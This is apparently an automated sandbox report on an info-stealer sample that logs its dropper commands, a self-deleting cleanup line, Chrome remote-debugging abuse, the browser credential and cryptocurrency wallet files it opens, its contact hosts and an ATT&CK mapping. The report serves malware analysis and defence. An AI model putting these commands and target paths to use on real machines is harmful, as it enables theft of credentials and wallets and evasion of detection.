                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B414AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 10_2_00B414AE
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B41FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00B41FB0
                Source: Dry.com, 0000000A.00000000.1691722119.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp, Dry.com.1.dr, Volunteer.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Dry.com | Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B00A08 cpuid 10_2_00B00A08
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B3E5F4 GetLocalTime, 10_2_00B3E5F4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B3E652 GetUserNameW, 10_2_00B3E652
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B1BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 10_2_00B1BCD2
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831

                Stealing of Sensitive Information

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 10.2.Dry.com.3f90000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \ElectronCash\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: exodus.conf.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Exodus\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: info.seco
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: ElectrumLTC
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: passphrase.json
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: Exodus
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: MultiDoge
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: seed.seco
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: Dry.com, 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Dry.comBinary or memory string: WIN_81
                Source: Dry.comBinary or memory string: WIN_XP
                Source: Volunteer.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Dry.com; Binary or memory string: WIN_XPe
                Source: Dry.com; Binary or memory string: WIN_VISTA
                Source: Dry.com; Binary or memory string: WIN_7
                Source: Dry.com; Binary or memory string: WIN_8
                Source: Yara match; File source: 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: 10.2.Dry.com.3f90000.1.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com; Code function: 10_2_00B62263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com; Code function: 10_2_00B61C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one column per tactic; each cell is a technique, prefixed by the number shown in the report where one was given)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 221 Security Software Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 111 Masquerading | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1579617; Sample: 9EI7wrGs4K.exe; Startdate: 23/12/2024; Architecture: WINDOWS; Score: 100

                • Start: DNS/IP info: toptek.sbs, t.me, bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Multi AV Scanner detection for submitted file, 5 other signatures
                • 9EI7wrGs4K.exe 29 started
                • cmd.exe 2 started by 9EI7wrGs4K.exe; dropped: C:\Users\user\AppData\Local\Temp\...\Dry.com, PE32; signature: Drops PE files with a suspicious file extension
                • Started by cmd.exe: Dry.com 28, cmd.exe 2, conhost.exe, 7 other processes
                • Dry.com: DNS/IP info: t.me 149.154.167.99, 443, 49741 TELEGRAMRU United Kingdom; toptek.sbs 94.130.188.57, 443, 49742, 49743 HETZNER-ASDE Germany; 127.0.0.1 unknown unknown; signatures: Attempt to bypass Chrome Application-Bound Encryption, Found many strings related to Crypto-Wallets (likely being stolen), Found API chain indicative of sandbox detection, 4 other signatures
                • Started by Dry.com: chrome.exe, cmd.exe 1
                • chrome.exe: DNS/IP info: 192.168.2.4, 138, 443, 49572 unknown unknown; 239.255.255.250 unknown Reserved; started: chrome.exe
                • cmd.exe (child of Dry.com): started conhost.exe, timeout.exe 1
                • chrome.exe (child of chrome.exe): DNS/IP info: www.google.com 142.250.181.132, 443, 49754, 49755 GOOGLEUS United States

                Source | Detection | Scanner | Label | Link
                9EI7wrGs4K.exe | 21% | ReversingLabs | |
                9EI7wrGs4K.exe | 18% | Virustotal | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\245347\Dry.com | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                toptek.sbs | 94.130.188.57 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                www.google.com | 142.250.181.132 | true | false | | high
                bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO | unknown | unknown | false | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://duckduckgo.com/chrome_newtab | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.dr | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/( | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.dr | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/2 | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anglebug.com/4633 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://google-ohttp-relay-join.fastly-edge.com/5 | chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://anglebug.com/7382 | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | false | | high
